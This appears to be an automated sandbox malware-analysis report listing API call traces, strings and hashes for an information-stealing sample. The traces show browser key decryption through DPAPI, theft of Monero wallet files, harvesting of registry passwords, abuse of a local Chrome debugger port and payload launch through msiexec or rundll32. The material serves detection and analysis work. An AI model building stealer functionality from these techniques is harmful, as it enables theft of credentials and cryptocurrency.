                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s$lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 348468850-0
                                      • Opcode ID: e52880565d129af28a5f69432b9d54d6fdd3fcd29681398848d849162f015342
                                      • Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
                                      • Opcode Fuzzy Hash: e52880565d129af28a5f69432b9d54d6fdd3fcd29681398848d849162f015342
                                      • Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00413415
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0041373A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: eb03b3a0b22b6dfbba97b23669552248c9f138026661cfac13ec68621a67f2e0
                                      • Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
                                      • Opcode Fuzzy Hash: eb03b3a0b22b6dfbba97b23669552248c9f138026661cfac13ec68621a67f2e0
                                      • Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9
                                      APIs
                                      • memset.MSVCRT ref: 004144EE
                                      • memset.MSVCRT ref: 00414505
                                        • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0041453C
                                      • lstrcatA.KERNEL32(?,02EB5978), ref: 0041455B
                                      • lstrcatA.KERNEL32(?,?), ref: 0041456F
                                      • lstrcatA.KERNEL32(?,02EB5360), ref: 00414583
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                        • Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                        • Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                        • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                        • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                        • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                        • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                        • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                        • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                        • Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563
                                      • StrStrA.SHLWAPI(?,02EB5888), ref: 00414643
                                      • GlobalFree.KERNEL32(?), ref: 00414762
                                        • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                        • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                        • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                        • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                        • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                      • lstrcatA.KERNEL32(?,00000000), ref: 004146F3
                                      • StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
                                      • lstrcatA.KERNEL32(00000000,?), ref: 00414735
                                      • lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 1191620704-0
                                      • Opcode ID: e6855c9f001d1c02cd0542eea975edd43dd132d7f4dc845d8e99b5bd53663b4c
                                      • Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
                                      • Opcode Fuzzy Hash: e6855c9f001d1c02cd0542eea975edd43dd132d7f4dc845d8e99b5bd53663b4c
                                      • Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55
                                      APIs
                                      • memset.MSVCRT ref: 048D4755
                                      • memset.MSVCRT ref: 048D476C
                                        • Part of subcall function 048D91D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 048D9202
                                      • lstrcat.KERNEL32(?,00000000), ref: 048D47A3
                                      • lstrcat.KERNEL32(?,006D6D0C), ref: 048D47C2
                                      • lstrcat.KERNEL32(?,?), ref: 048D47D6
                                      • lstrcat.KERNEL32(?,006D6FD8), ref: 048D47EA
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048D9187: GetFileAttributesA.KERNEL32(00000000,?,048C1DFB,?,?,0042577C,?,?,00420E22), ref: 048D9196
                                        • Part of subcall function 048CA697: StrStrA.SHLWAPI(00000000,00421360), ref: 048CA6F0
                                        • Part of subcall function 048CA697: memcmp.MSVCRT(?,00421244,00000005), ref: 048CA749
                                        • Part of subcall function 048CA377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 048CA3A3
                                        • Part of subcall function 048CA377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 048CA3C8
                                        • Part of subcall function 048CA377: LocalAlloc.KERNEL32(00000040,?), ref: 048CA3E8
                                        • Part of subcall function 048CA377: ReadFile.KERNEL32(000000FF,?,00000000,048C16F6,00000000), ref: 048CA411
                                        • Part of subcall function 048CA377: LocalFree.KERNEL32(048C16F6), ref: 048CA447
                                        • Part of subcall function 048CA377: CloseHandle.KERNEL32(000000FF), ref: 048CA451
                                        • Part of subcall function 048D97B7: GlobalAlloc.KERNEL32(00000000,048D4894,048D4894), ref: 048D97CA
                                      • StrStrA.SHLWAPI(?,006D6AD8), ref: 048D48AA
                                      • GlobalFree.KERNEL32(?), ref: 048D49C9
                                        • Part of subcall function 048CA477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048C51A5,00000000,00000000), ref: 048CA4A6
                                        • Part of subcall function 048CA477: LocalAlloc.KERNEL32(00000040,?,?,?,048C51A5,00000000,?), ref: 048CA4B8
                                        • Part of subcall function 048CA477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048C51A5,00000000,00000000), ref: 048CA4E1
                                        • Part of subcall function 048CA477: LocalFree.KERNEL32(?,?,?,?,048C51A5,00000000,?), ref: 048CA4F6
                                        • Part of subcall function 048CA7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 048CA7E4
                                      • lstrcat.KERNEL32(?,00000000), ref: 048D495A
                                      • StrCmpCA.SHLWAPI(?,004208D2), ref: 048D4977
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 048D4989
                                      • lstrcat.KERNEL32(00000000,?), ref: 048D499C
                                      • lstrcat.KERNEL32(00000000,00420FA0), ref: 048D49AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 1191620704-0
                                      • Opcode ID: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
                                      • Instruction ID: b1a7ebd6e665b9fb27d68df334cb1da82a2f83346d8d9fe02847b24d4bff3d2b
                                      • Opcode Fuzzy Hash: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
                                      • Instruction Fuzzy Hash: E27174B1D01218ABDB14EBA4DC89FEE7379AF88304F044A99E605D7190EB75EB44CF51
                                      APIs
                                      • memset.MSVCRT ref: 00401327
                                        • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                        • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                        • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                        • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                        • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                      • lstrlenA.KERNEL32(?), ref: 0040135C
                                      • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                        • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                        • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                        • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                        • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                        • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                        • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                      • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                      • memset.MSVCRT ref: 00401516
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 1930502592-218353709
                                      • Opcode ID: 406416fd0cef8770c5c9c7173cbd786a4a6ea1c8551d2acd55ade52b06d068c6
                                      • Instruction ID: 8a875ffafc7cdb1f6750a56d7bf9635fee6f51bf8c43acc15b4905507f63a119
                                      • Opcode Fuzzy Hash: 406416fd0cef8770c5c9c7173cbd786a4a6ea1c8551d2acd55ade52b06d068c6
                                      • Instruction Fuzzy Hash: 915153B1E5011857CB14EB60DD96BED733D9F54304F4045EEB60A62092EE346BD8CAAE
                                      APIs
                                        • Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D
                                        • Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AA1
                                        • Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AB8
                                        • Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4ACF
                                        • Part of subcall function 048C4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 048C4AF0
                                        • Part of subcall function 048C4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 048C4B00
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 048C4BCC
                                      • StrCmpCA.SHLWAPI(?,006D6E80), ref: 048C4BF1
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 048C4D71
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,00421AB8,00000000,?,006D6F14), ref: 048C509F
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 048C50BB
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 048C50CF
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 048C5100
                                      • InternetCloseHandle.WININET(00000000), ref: 048C5164
                                      • InternetCloseHandle.WININET(00000000), ref: 048C517C
                                      • HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 048C4DCC
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                      • InternetCloseHandle.WININET(00000000), ref: 048C5186
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID:
                                      • API String ID: 2402878923-0
                                      • Opcode ID: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
                                      • Instruction ID: 406b14f09fda4b3001181d540e7d59b3b9a2031151eb4731a8ba2601f801cf44
                                      • Opcode Fuzzy Hash: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
                                      • Instruction Fuzzy Hash: 9712E271902228AADB1DEB94DC51FEEB375AF14705F604A99A147E2090EFB07F48CF52
                                      APIs
                                        • Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D
                                        • Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AA1
                                        • Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AB8
                                        • Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4ACF
                                        • Part of subcall function 048C4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 048C4AF0
                                        • Part of subcall function 048C4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 048C4B00
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                      • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 048C6598
                                      • StrCmpCA.SHLWAPI(?,006D6E80), ref: 048C65BA
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 048C65EC
                                      • HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 048C663C
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 048C6676
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 048C6688
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 048C66B4
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 048C6724
                                      • InternetCloseHandle.WININET(00000000), ref: 048C67A6
                                      • InternetCloseHandle.WININET(00000000), ref: 048C67B0
                                      • InternetCloseHandle.WININET(00000000), ref: 048C67BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID:
                                      • API String ID: 3074848878-0
                                      • Opcode ID: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
                                      • Instruction ID: fd940fb1dcf69ce415187eade6944be35e134daf253dccf77396911e0cb661e6
                                      • Opcode Fuzzy Hash: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
                                      • Instruction Fuzzy Hash: BB717271A41218EBEB14DF94CC48FEDB775AF44704F104AA9E50ABB190EBB5BA84CF41
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 048D9463
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID:
                                      • API String ID: 2244384528-0
                                      • Opcode ID: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
                                      • Instruction ID: abdac7a0dd372cb44f53839c258eb2fc89945714d66583e168420ed343cf34a0
                                      • Opcode Fuzzy Hash: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
                                      • Instruction Fuzzy Hash: EF71EAB5E15208ABDB04EFE4DC88FEDB779AF48304F108649F515E7294EB74AA04CB61
                                      APIs
                                        • Part of subcall function 048C9CB7: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 048C9CD1
                                      • memset.MSVCRT ref: 048C9E9A
                                      • lstrcat.KERNEL32(?,004212A8), ref: 048C9EAF
                                      • lstrcat.KERNEL32(?,00000000), ref: 048C9EC5
                                      • memset.MSVCRT ref: 048C9F01
                                      • lstrcat.KERNEL32(?,004212BC), ref: 048C9F16
                                      • lstrcat.KERNEL32(?,004212C4), ref: 048C9F28
                                      • lstrcat.KERNEL32(?,?), ref: 048C9F3C
                                      • lstrcat.KERNEL32(?,004212C8), ref: 048C9F4E
                                      • lstrcat.KERNEL32(?,?), ref: 048C9F62
                                      • lstrcat.KERNEL32(?,004212CC), ref: 048C9F74
                                      • lstrlen.KERNEL32(00000000), ref: 048C9F7E
                                      • lstrlen.KERNEL32(00000000), ref: 048C9F8D
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                      • memset.MSVCRT ref: 048C9FE5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
                                      • String ID:
                                      • API String ID: 689835475-0
                                      • Opcode ID: dfb927d2f1fb8a0db0fdcd0bcab99d2dca3d169bc9a1ca59a3c17c24f69ee733
                                      • Instruction ID: 1d6214e4c6929c8b9bb3ee1c8b8559eb21614ed3389c7d4ed2adbaea2889585a
                                      • Opcode Fuzzy Hash: dfb927d2f1fb8a0db0fdcd0bcab99d2dca3d169bc9a1ca59a3c17c24f69ee733
                                      • Instruction Fuzzy Hash: F95160B1D00218ABDB14EBE4DC99FEE7738BF14306F405A99E505E6090EB75A644CF62
                                      APIs
                                      • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                      • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
                                      • InternetCloseHandle.WININET(00000000), ref: 00409AC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$Open$CloseHandle
                                      • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                      • API String ID: 3289985339-2144369209
                                      • Opcode ID: f6ea82a8e87bece4c9da886c2de84f051623a7f4925580be6bfbf86350bd66ae
                                      • Instruction ID: 62dbe43bf40bcea2ec6919899f10ce169cdfcd29f6908f6eb26e58a13f6c9638
                                      • Opcode Fuzzy Hash: f6ea82a8e87bece4c9da886c2de84f051623a7f4925580be6bfbf86350bd66ae
                                      • Instruction Fuzzy Hash: 27414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505B6191DBB8AEC0CF68
                                      APIs
                                        • Part of subcall function 00407330: memset.MSVCRT ref: 00407374
                                        • Part of subcall function 00407330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                        • Part of subcall function 00407330: RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                        • Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                        • Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                        • Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                      • lstrcatA.KERNEL32(00000000,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 004076A8
                                      • lstrcatA.KERNEL32(00000000, : ), ref: 004076BA
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076EF
                                      • lstrcatA.KERNEL32(00000000,00421934), ref: 00407700
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00407733
                                      • lstrcatA.KERNEL32(00000000,00421938), ref: 0040774D
                                      • task.LIBCPMTD ref: 0040775B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
